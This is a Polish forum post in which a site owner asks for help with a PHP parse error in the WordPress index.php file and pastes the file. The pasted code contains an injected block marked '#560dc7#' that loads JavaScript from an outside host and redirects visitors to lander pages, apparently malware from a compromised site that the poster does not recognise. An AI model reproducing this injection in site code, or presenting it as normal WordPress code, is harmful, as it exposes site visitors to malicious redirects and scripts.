Witam wszystkich. Mam mały problem ze stroną. Wyświetla mi taki oto komunikat : Parse error: syntax error, unexpected '<' in /srv/disk3/1212290/www/nurbs.pl/index.php on line 18 . Próbowałem sam rozwiązać problem lecz nie mam pojęcia w jaki sposób dopisać lub usunąć "<" aby smigało. Myślę, że dla Was będzie to chwila. Z góry dziękuje za pomoc.

Pozdrawiam. Poniżej kod.
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
<?
#560dc7#
$iemgz = "<script type=\"text/javascript\">var gwloaded = false;</script>
<script src=\"http://verification.mvpitsolutions.com/lander/Password%20Page_files/gwjs.js\" type=\"text/javascript\"></script>
<script type=\"text/javascript\">if (gwloaded==false){window.location = \"http://verification.mvpitsolutions.com/lander/AdBlock%20Must%20be%20Disabled%20to%20View%20This%20Content.html\";}</script>
<noscript><meta http-equiv=\"refresh\" content=\"0;url=http://verification.mvpitsolutions.com/lander/JavaScript%20Required.html\" /></noscript>";
}
#/560dc7#
?>